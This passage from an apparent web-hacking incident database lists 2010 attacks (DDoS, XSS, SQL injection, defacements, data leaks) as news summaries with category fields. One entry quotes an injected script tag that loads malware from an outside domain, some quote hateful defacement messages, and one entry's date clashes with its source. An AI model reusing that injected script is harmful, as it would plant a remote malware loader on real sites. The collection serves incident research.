Incident Description: Sorry for the outage yesterday between 8:00 AM and 7:00 PM. Virginia Right! was under attack with a Distributed Denial of Service. Part of the problem in resolving the issue is the fact that Virginia Right! is on a shared hosting server with many hosts using the same IP address. The first thing that has to be determined is which domain is under attack. They do this by temporarily assigning a static IP address to each site hosted on the server (as opposed to all of us sharing the same address). When they were done, everyone came back up except – Virginia Right!. So the attacks were specifically directed at us!
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://beforeitsnews.com/news/87/162/Virginia_Right_Under_Fire_Yesterday_With_DDOS_Attack.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-140: Hackers fleece online poker players
WHID ID: 2010-140
Date Occured: 6/28/2010
Attack Method: Malware
Application Weakness: Abuse of Functionality
Outcome: Monetary Loss
Attacked Entity Field: Entertainment
Attacked Entity Geography: Korea
Incident Description: Police arrested 33 hackers who used a “distribution of denial of service” program to cheat online poker players out of 55 million won ($45,265) from last November through May. The hackers, led by 30-year-old Yu and 29-year-old Kim, were booked without detention on charges of gaining illegal profits. The Cyber Terror Response Center in Gyeonggi said the gang used a DDOS attack to infect 11,000 computers at 700 PC rooms across the country. Police said Yu bought the “Netbot Attacker” program from a Chinese hacker last November, then sold copies online to Kim and others. The gang broke into the administrative systems of the PC rooms and installed the virus in their computers to allow them to see the hands of poker opponents.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://joongangdaily.joins.com/article/view.asp?aid=2922391
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-139: Twitter XSS Vulnerability Possibly Exploited by Turkish Hackers
WHID ID: 2010-139
Date Occured: 6/28/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Dimitris Pagkalos, one of the founders of the XSSed, a project that maintains an archive of XSS flaws and raises awareness about this type of Web vulnerability, notes that Twitter's security team promptly addressed the bug. However, he suggests the vulnerability might have been used in an earlier attack that made a rogue status reading "Hacked By Turkish Hackers" appear on almost one thousand Twitter profiles.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Twitter-XSS-Vulnerability-Possibly-Exploited-by-Turkish-Hackers-145594.shtml
Attack Source Geography: Turkey
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-138: Personal data accessed on Blue Cross website
WHID ID: 2010-138
Date Occured: 6/23/2010
Attack Method: Forceful Browsing
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field: Health
Attacked Entity Geography:
Incident Description: In a written statement, Anthem Blue Cross explained how the breach occurred: "The ability to manipulate the web address (URL) was available for a relatively short period of time following an upgrade to the system. After the upgrade was completed, a third party vendor validated that all security measures were in place, when in fact they were not. As soon as the situation was discovered, we made the necessary security changes to prevent it from happening again."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.ocregister.com/articles/information-254735-security-anthem.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-137: Persistent XSS on Twitter.com
WHID ID: 2010-137
Date Occured: 6/24/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Twitter user 0wn3d_5ys has demonstrated a persistent cross site scripting (XSS) vulnerability on Twitter he found on June 21st using his own Twitter account (visit at your own risk) that appears to be due to a lack of input validation of the application name field when accepting new requests for Twitter applications. Visiting his account on Twitter results in a pair of classic cross site scripting alert boxes, then your browser is manipulated, finally you enter the matrix (see below), and get messages from the researcher who found the vulnerability.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/
Attack Source Geography:
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-136: Hotel account hacked, card info stolen
WHID ID: 2010-136
Date Occured: 6/23/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Credit Card Leakage
Attacked Entity Field: Hospitality
Attacked Entity Geography: Austin, TX
Incident Description: Dozens of Driskill Hotel customers' credit card information has been stolen. Hackers in Europe were able to break into the hotel's parent company's website and steal the information. There are more than 700 victims nationwide.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.kxan.com/dpp/news/hotel-account-hacked,-card-info-stolen
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-135: Another round of Asprox SQL injection attacks
WHID ID: 2010-135
Date Occured: 6/23/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field:
Attacked Entity Geography:
Incident Description: Earlier this month, we reported on a new variant of Asprox malware which was being spammed out by the Pushdo botnet. At that time, the Asprox executables we analyzed were purely sending spam. However, a few days after our post, we noticed reports of mass infections of IIS/ASP websites. The nature of these attacks reminded us of SQL injection attacks back in 2008 where Asprox was clearly involved. We suspected that the re-emergence of Asprox and these new mass website infections were not merely a coincidence. Well, this week our suspicions were confirmed when we came across another version of Asprox which started to launch both spam and SQL injection attacks.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.m86security.com/labs/i/Another-round-of-Asprox-SQL-injection-attacks,trace.1366~.asp
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-134: Major hack of Israeli Twitter accounts
WHID ID: 2010-134
Date Occured: 6/22/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Defacement
Attacked Entity Field: Web 2.0
Attacked Entity Geography: Israel
Incident Description: According to Mikko Hyponnen, chief research officer with F-Secure, more than 1000 accounts on the microblogging social networking service were hacked within the space of 12 hours, each of them broadcasting the message: "Hacked by Turkish Hackers." In a security blog posting made last night, Hyponnen said that, although the exploit mechanism is unclear, most of the compromised accounts "seem to seem to belong to Israeli Twitter users."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.infosecurity-magazine.com/view/10426/major-hack-of-israeli-twitter-accounts-/
Attack Source Geography: Turkey
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-133: Druknet websites hacked
WHID ID: 2010-133
Date Occured: 6/19/2010
Attack Method: Known Vulnerability
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field: Hosting Providers
Attacked Entity Geography: Bhutan
Incident Description: Local internet service provider (ISP) Druknet is currently recovering, after 50 of its websites were hacked early yesterday. Users trying to access certain websites hosted by the ISP were greeted with a blank home page and a message that said the website had been hacked. Although some of the hacked websites were back online by afternoon, many websites were still down as of last night. Druknet’s web server, on which the websites are stored, was also taken offline periodically throughout yesterday. The hacker or hackers had exploited websites designed, using free open sourced content management systems (CMS), like Word Press, according to Druknet.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.kuenselonline.com/modules.php?name=News&file=article&sid=15822
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-132: Another Opposition Website Shut Down by Hackers
WHID ID: 2010-132
Date Occured: 6/19/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: News
Attacked Entity Geography: Burma
Incident Description: The popular Burmese Web site photayokeking.org, edited by a Burmese army deserter, was recently attacked, leaving it inaccessible and out of operation. According to one of the editors, who goes by the name Photayoke, the Web site came under major attacks on May 27 and June 11, following three smaller attacks. On June 11, the server provider sent an email to the Web site's owners stating that a major distributed denial-of-service attack (DDoS) had been focused on their data center.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.irrawaddy.org/article.php?art_id=18759
Attack Source Geography: Burma
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-131: DoS attack stuffs Turkey's internet censors
WHID ID: 2010-131
Date Occured: 6/18/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: Turkey
Incident Description: Access to the internet in Turkey is becoming increasingly ragged, as growing state censorship collides with retaliation by anti-censorship hackers, leading to difficulties both in viewing sites and applying key online functions. Since early this morning the websites of the Ministry of Transportation, the Information and Communication Technologies Authority and the Telecommunications Communication Presidency have been inaccessible. These three state bodies are responsible for internet censorship and have been the principal actors behind attempts to block access to YouTube and Google-related services in Turkey. A number of theories abound, with favourites the state authorities’ websites have either been hacked or subject to a serious denial of service attack by hackers unhappy at the censorship. Writing for the CyberLaw UK Blog, Dr Yaman Akdeniz, Associate Professor at the Faculty of Law, Istanbul Bilgi University, now writes that it has been confirmed as a denial of service attack coordinated by a group of hackers to protest against internet censorship in Turkey, and that the attack lasted 10 hours.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/06/18/turkey_dos_attack/
Attack Source Geography: Turkey
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-130: Google Trends Hacked With Racial Slur (Again!)
WHID ID: 2010-130
Date Occured: 6/17/2010
Attack Method: Process Automation
Application Weakness: Insufficient Anti-automation
Outcome: Disinformation
Attacked Entity Field: Search Engine
Attacked Entity Geography: San Jose, California
Incident Description: Google Trends is a powerful tool that many media companies (us included) rely upon for a sense of what new topics people are searching for at any given time -- at least, when it's not getting hacked with racial slurs, which is exactly what happened early this morning. At around 9 a.m. Eastern, instead of the normal list of the hottest new search terms of the hour, visitors to the Google Trends website were greeted with the phrase "lol n------".
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.politicsdaily.com/2010/06/17/google-trends-hacked-with-racial-slur-again/
Attack Source Geography:
Attacked System Technology: Google
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-129: Hackers Seize Top Tory’s Facebook, Blog & Twitter Accounts
WHID ID: 2010-129
Date Occured: 6/17/2010
Attack Method: Unknown
Application Weakness: Insufficient Authentication
Outcome: Disinformation
Attacked Entity Field: Web 2.0
Attacked Entity Geography: London, England
Incident Description: hackers have stolen the account details of Therese Coffey, Tory candidate for Suffolk Coastal (UK Parliament constituency), London Spin can exclusively reveal. The attackers bombarded social media users with sexually explicit messages and comments after gaining access to her Blog, Facebook and Twitter account details.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.londonspinonline.com/2010/06/exclusive-hackers-seize-top-torys.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-128: Microsoft Sues Alleged Spammer For Circumventing Filters
WHID ID: 2010-128
Date Occured: 6/16/2010
Attack Method: Process Automation
Application Weakness: Abuse of Functionality
Outcome: Spam
Attacked Entity Field: Information Services
Attacked Entity Geography: Washington, USA
Incident Description: Microsoft has sued Connecticut resident Boris Mizhen for allegedly gaming Hotmail's spam filters and sending unwanted emails to consumers. Mizhen, who previously settled a separate spam lawsuit brought by Microsoft, allegedly got around the company's anti-spam system by creating millions of new email accounts and then arranging for those accounts to classify his messages as "not spam," according to the lawsuit. "Defendants developed and executed an elaborate scheme to circumvent Microsoft's Hotmail spam filters to disseminate a large quantity of spam email advertisements to Microsoft's Hotmail users," the company alleges in its complaint, filed last week in federal district court in Seattle. The complaint details how Mizhen and his affiliates allegedly manipulated the statistics that Microsoft's anti-spam system relies on by creating millions of new email accounts and then moving up to 200,000 of their own messages a day from "junk" files into inboxes.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.mediapost.com/publications/?fa=Articles.showArticle&art_aid=130320
Attack Source Geography: Connecticut, USA
Attacked System Technology: Hotmail
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-127: Israeli hacker hits IHH website
WHID ID: 2010-127
Date Occured: 6/17/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Monetary Loss
Attacked Entity Field: Politics
Attacked Entity Geography: Turkey
Incident Description: An Israeli hacker managed to break into the website of Turkish IHH group, which organized the Gaza flotilla, disabling the organization's fundraising mechanism for a few hours. The 30-year-old hacker from Holon, who wished to remain anonymous, said he was concerned with Israel's poor PR efforts and decided to make a contribution of his own. "The real war today is online. I spent an entire week exploring the site, a few hours each night, until I succeeded," he said. The hacker added that he was surprised to learn that IHH received some 9,000 euros in donations every hour via the website. The group is planning to send a second flotilla to Gaza next month.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.ynetnews.com/articles/0,7340,L-3906872,00.html
Attack Source Geography: Israel
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-126: Website breached by hacker through SQL injection - exposing personal information of customers
WHID ID: 2010-126
Date Occured: 3/24/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Credit Card Leakage
Attacked Entity Field: Entertainment
Attacked Entity Geography: New Hampshire, USA
Incident Description: New Hampshire breach notification: HBDirect.com - Website hacked through SQL injection - exposing credit cards of customers from December 1, 2009 to February 10, 2010. 19 NH residents affected.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://datalossdb.org/primary_sources/2548
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-125: Eastern European banks under attack by next-gen crime app
WHID ID: 2010-125
Date Occured: 6/16/2010
Attack Method: Banking Trojan
Application Weakness: Insufficient Anti-automation
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: Russia
Incident Description: Banks in Russia and Ukraine are under continued siege by criminal gangs wielding a sophisticated, next-generation exploitation kit that hacks the financial institutions' authentication system and then hits it with a denial-of-service attack. The attacks are being carried out with the help of a top-to-bottom revision of BlackEnergy, a popular hack-by-numbers toolkit that until recently was used primarily to launch DDoS, or distributed denial-of-service, attacks. Eastern European criminal gangs are using the expanded capabilities of BlackEnergy 2 to siphon funds out of electronic bank accounts and then assault the financial institutions with more data than they can handle, said Joe Stewart, a researcher with security firm SecureWorks' Counter Threat Unit.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/06/16/blackenergy2_ddos_attacks/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-124: Riyad Bank Website Gets Hacked
WHID ID: 2010-124
Date Occured: 6/14/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Defacement
Attacked Entity Field: Finance
Attacked Entity Geography: Saudi Arabia
Incident Description: Saudi bank Riyad Bank has been hacked by a group of hackers who posted a message demanding to end the service of the Mayor of Al Madina province in Saudi Arabia. Al Madina is the second holiest city in Islam, and the burial place of the Prophet Muhammad peace be upon him and it is the capital of the first Islamic state established by the Prophet and his companions after early Muslims migrated from oppression imposed by their people in Mecca around 1400 years ago. The hacker/s only managed to hack the homepage of the site as the internal pages seems intact, the hackers displayed a message on the bank’s homepage apologizing to the bank and saying “we are hacking you to deliver a message to the king of Saudi Arabia.” They asked him to fire the Mayer.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://arabcrunch.com/2010/06/riyad-bank-website-gets-hacked.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-123: Botnet hijacks web servers for DDoS campaign
WHID ID: 2010-123
Date Occured: 5/13/2010
Attack Method: Unknown
Application Weakness: Application Misconfiguration
Outcome: Botnet Participation
Attacked Entity Field: Service Providers
Attacked Entity Geography: Netherlands
Incident Description: Researchers at Imperva have discovered an 'experimental' botnet that uses around 300 hijacked web servers to launch high-bandwidth DDoS attacks. The servers are all believed to be open to an unspecified security vulnerability that allows the attacker, who calls him or herself 'Exeman', to infect them with a tiny, 40-line PHP script. This includes a simple GUI from which the attacker can return at a later date to enter in the IP, port and duration numbers for the attack that is to be launched.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.computerworld.com.au/article/346342/botnet_hijacks_web_servers_ddos_campaign/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-122: Attack of WordPress Blogs on Rackspace
WHID ID: 2010-122
Date Occured: 6/15/2010
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Insufficient Process Validation
Outcome: Planting of Malware
Attacked Entity Field: Service Providers
Attacked Entity Geography: USA
Incident Description: If you follow our blog, you probably noticed that these last few months have been specially hard for hosting companies. Lots of them got hacked, bringing down thousands of sites with them. Now we are hearing reports of a mass hack of WordPress blogs hosted on Rackspace. What is going on? The attackers were able to get access to Rackspace databases and infect the sites through there. They created a new admin user on many Worpress sites, giving them full access to the WordPress admin panel. With that access they were able to inject malware, and as we saw before they used that to inject SEO spam to the sites. One of the posts in that thread also suggests that the attack vector is a vulnerable version (2.11.3) of phpMyAdmin used by RackSpace Cloud. If this is true, hackers must have targeted an XSRF attack at one of RackSpace admins with mySql root permissions to gain access to the whole database (probably created one more admin user). At this point, RackSpace has upgraded their phpMyAdmin nodes. Hope, they also found any changes in the database done by those hackers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blog.sucuri.net/2010/06/mass-attack-of-wordpress-blogs-on-rackspace.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://blog.unmaskparasites.com/2010/06/14/attack-on-wordpress-blogs-on-rackspace/
Entry Title: WHID 2010-121: Second round of GoDaddy sites hacked
WHID ID: 2010-121
Date Occured: 5/1/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Planting of Malware
Attacked Entity Field: Service Providers
Attacked Entity Geography: USA
Incident Description: It seems that a second round of attacks are happening today at GoDaddy and infecting all kind of sites (Joomla, Wordress,etc). Looking at the modification dates on the files, they all happened May 1st (today) during the morning from 1 to 3/4 am. All of them had the following javascript added to their pages: script src= http://kdjkfjskdfjlskdjf.com/kp.php Which looks very similar to the attacks from the last few weeks, but this time using kp.php instead of js.php. Also, many sites that were not infected during the previous batch got hacked now.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link: http://blog.sucuri.net/2010/05/found-code-used-to-inject-the-malware-at-godaddy.html
Entry Title: WHID 2010-120: Colombian government sites hacked (and spreading malware)
WHID ID: 2010-120
Date Occured: June 2011
Attack Method: Remote File Inclusion (RFI)
Application Weakness: Application Misconfiguration
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: Colombia
Incident Description: You would expect that a security-related web site would be secure, no? What about an official web site from a Government? Should that be safe? What about a government web site about security? Shouldn’t that be ultra super secure? (yes, I am joking ) That’s not always the case… At Sucuri Security we have two main goals: Monitor your visible Internet presence (via DNS, site content changes, whois, blacklisting status, etc), and to also monitor what is not visible (or easily accessible). So we run multiple honey pots, we monitor IRC chats used by botnets and attackers, multiple forums, etc. All with the goal to protect our clients and notify them if we see any issue in the “underground”. With this work, we get to see a lot of sites being exploited and attacked. Most of them are small sites, but sometimes we see big companies, .govs and many .edus in there. One of those government web sites are from Colombia. And they are not a normal .gov site, they are about security and about cyber crimes. They have two web sites that are currently hacked: http://www.delitosinformaticos.gov.co (related to solving cyber crimes) and http://www.frentesdeseguridad.gov.co (related to security in general). We tried to contact them and got no replies. We would wait a little more to publish it, but since clem1 mentioned them on our post about Georgia government sites hacked, I think it is time to use full-disclosure to get them fixed.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blog.sucuri.net/2010/02/colombia-government-sites-hacked-and-spreading-malware.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-119: Georgia government sites hacked (and spreading malware)
WHID ID: 2010-119
Date Occured: 2/15/2010
Attack Method: Remote File Inclusion (RFI)
Application Weakness: Application Misconfiguration
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: imereti, GE
Incident Description: *UPDATE: A few hours after this post, they removed the malware from justice.gov.ge and other sites. I am glad we had some effect. You know, you would think that after all the attacks that Georgia suffered in 2008 they would be more careful about the security of their sites. Well, not really. Even after I sent a bunch of emails to all their addresses that I could find and requested on twitter for contacts in the .ge government, nobody replied and they are still hacked, spreading malware and attacking other systems. It doesn’t look like it is being caused by the Russians or anything like that. And the attackers this time didn’t defaced their web page. They just added some malware and scripts to attack others. How do I know? We run multiple honeypots to detect web-based attacks and malware. And guess who started attacking us?
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blog.sucuri.net/2010/02/georgia-government-sites-hacked-and-spreading-malware.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-118: Two Korean govt. websites attacked by hackers
WHID ID: 2010-118
Date Occured: 6/12/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome:
Attacked Entity Field: Government
Attacked Entity Geography: South Korea
Incident Description: Two South Korean government Web sites were attacked again Saturday by hackers traced to China, but there was no major damage, the home ministry said. The sites of the Ministry of Justice and the Korea Culture and Information Service were hit by a massive number of access attempts in what is knowns as distributed denial-of-service (DDoS) attacks from 247 China-based Internet servers, according to the Ministry of Public Administration and Security.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://english.yonhapnews.co.kr/techscience/2010/06/12/73/0601000000AEN20100612002100315F.HTML
Attack Source Geography: China
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-117: Turkish Hacker Hijacks .CO.IL MSN and Hotmail Domains
WHID ID: 2010-117
Date Occured: 6/10/2010
Attack Method: DNS Hijacking
Application Weakness: Insufficient Process Validation
Outcome: Defacement
Attacked Entity Field: Information Services
Attacked Entity Geography:
Incident Description: A Turkish hacker has managed to hijack msn.co.il and hotmail.co.il, two domains belonging to Microsoft, and use them to post a pro-Palestinian message. The name servers and administrative email address for the domains have been changed. Users who accessed hotmail.co.il and msn.co.il earlier today were greeted by a page displaying the image of a child wearing the Palestinian flag as a cape and a message reading, "Free Palestine. Hi to greatest [expletive] of the world (i mean all the Jews). u think one day u will own all the world eh? Lol that makes me laugh. that makes all the world laugh. u are just insects. make muslims angrier and just sit and watch what will happen to you." The attacker signs the messsage as TurkGuvenligi Tayfa ("from Turkey with love") and sends greetings to Pakbugs, a notorious group of hackers and defacers. It appears that the two Microsoft domains, which normally redirect users to login.live.com and il.msn.com, respectively, had their name server information altered. The new ns1.dollar2host.com and ns2.dollar2host.com name servers, which belong to a private Web hosting company, replaced the usual ns1.msft.net and ns2.msft.net that Microsoft used for its domains.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Turkish-Hacker-Hijacks-CO-IL-MSN-and-Hotmail-Domains-144299.shtml
Attack Source Geography: Turkey
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-116: Hackers: Data Breach Exposed iPad Owners' Personal Info
WHID ID: 2010-116
Date Occured: 6/9/2010
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Anti-automation
Outcome: Leakage of Information
Attacked Entity Field: Information Services
Attacked Entity Geography: USA
Incident Description: A security flaw in AT&T's network exposed the e-mail addresses of more than 100,000 owners of Apple's 3G iPad, according to a report published by Gawker today. Calling it the "most exclusive e-mail list on the planet," Gawker said the list of exposed owners included New York Mayor Michael Bloomberg, White House Chief of Staff Rahm Emanuel and other powerful figures in finance, media and politics. The security hole was uncovered by Goatse Security, a group known among security experts as hackers who enjoy pulling Web pranks, Gawker reported. Still, the group previously has uncovered flaws in browsers Firefox and Safari, Gawker said. When contacted by ABCNews.com, a man who asked to be named as a Goatse employee confirmed Gawker's report. "It's absolutely real," he said, adding that the group gave the Gawker reporter their data set and he was able to verify the information. The employee said someone in his organization learned that when given an iPad owners' unique identification number, a program on AT&T's website would return the e-mail address connected to that account. Once the hole was uncovered, he said, the group was able to write a script that would automatically predict ID numbers and return the associated e-mail addresses. In about six hours, he said, the group was able to scrape information for about 114,000 iPad 3G owners, but he did not say how many iPad owners could have been affected in total.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://abcnews.go.com/print?id=10871229
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-115: Mass hack plants malware on thousands of webpages
WHID ID: 2010-115
Date Occured: 6/9/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field:
Attacked Entity Geography: USA
Incident Description: More than 100,000 webpages, some belonging to newspapers, police departments, and other large organizations, have been hit by an attack over the past few days that redirected visitors to a website that attempted to install malware on their machines. The mass compromise appears to have affected sites running a banner-ads module on top of Microsoft's Internet Information Services using ASP.net, said David Dede, head of malware research at Sucuri, a website monitoring firm. The sites were infected using SQL injection exploits, which allow attackers to tamper with a server's database by typing commands into search boxes and other user-input fields. The hackers used the exploit to plant iframes in the compromised sites that redirected visitors to robint.us. Malicious javascript on that site attempted to infect end users with malware dubbed Mal/Behav-290 according to anti-virus firm Sophos.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/06/09/mass_webpage_attack/
Attack Source Geography: China
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-114: Seven held in Andhra for hacking passport software
WHID ID: 2010-114
Date Occured: 6/4/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Process Validation
Outcome: Extortion
Attacked Entity Field: Government
Attacked Entity Geography: India
Incident Description: Seven people were arrested in Andhra Pradesh for hacking the online passport application software of the Hyderabad regional passport office, police said Friday. Police Commissioner A.K. Khan told reporters that seven people, among them five passport agents, were arrested and a search was on for two other agents involved in the racket. The passport office releases online slots for confirmed dates of appointments to the applicants for obtaining passports under 'Tatkal' scheme through its website www.passport.gov.in. Every day these slots were visible to the users only for a few minutes till the slots released by the passport authorities were exhausted. The accused hacked the website, blocked the online slots and were selling the same to the applicants for huge sums, police said.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://sify.com/news/seven-held-in-andhra-for-hacking-passport-software-news-national-kger4bcghcf.html
Attack Source Geography: India
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-113: Facebook plugs email address indexing bug
WHID ID: 2010-113
Date Occured: 6/4/2010
Attack Method: Unintentional Information Disclosure
Application Weakness: Insecure Indexing
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Incident-prone social network monolith Facebook has plugged yet another security leak, this time involving the indexing by search engines of email addresses not listed on Facebook. Thousands of email addresses submitted using Facebook's "Find a friend" feature that were not tied to a Facebook account wound up getting indexed by Google, according to Blogger Cory Watilo, who was among those affected. "One obvious problem is that spammers can easily scrape this data and add easily legitimate address to their lists, many of whom might not give their addresses to Facebook for a reason," Watilo writes. The issue sparked a lively discussion thread on Hacker News. Facebook changed its robot.txt file to prevent the search engine from indexing the relevant "opt out of emails from Facebook" page so that email address data can no longer be harvested by spammers or other miscreants.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/06/04/facebook_email_indexing_snafu/
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-112: Turkish Cyber Hackers Strike at Israel
WHID ID: 2010-112
Date Occured: 6/2/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Israel
Incident Description: The unofficial Likudnik website was targeted by angry Turkish hackers who were apparently less than pleased with the IDF Navy commando operation which prevented the terrorists on board from breaking the Gaza embargo on Hamas-controlled Gaza.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theyeshivaworld.com/news/Israeli+News/60651/Turkish-Cyber-Hackers-Strike-at-Israel.html
Attack Source Geography: Turkey
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-111: Thieves steal virtual furniture from unsuspecting Hotel Habbo players
WHID ID: 2010-111
Date Occured: 6/2/2010
Attack Method: Phishing
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Entertainment
Attacked Entity Geography: Finland
Incident Description: Finnish police are searching for thieves who stole 1,000 Euros (about $1,200 U.S.) worth of virtual furniture and other items from the virtual world Habbo Hotel. The thieves allegedly used phishing scams to the capture usernames and passwords from Habbo Hotel users, who contacted Finnish police after they noticed that their virtual goods missing.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.gamezebo.com/news/2010/06/02/thieves-steal-virtual-furniture-unsuspecting-hotel-habbo-players
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-110: Local restaurant's computer hacked, customers' card numbers stolen
WHID ID: 2010-110
Date Occured: 5/22/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Credit Card Leakage
Attacked Entity Field: Retail
Attacked Entity Geography: USA
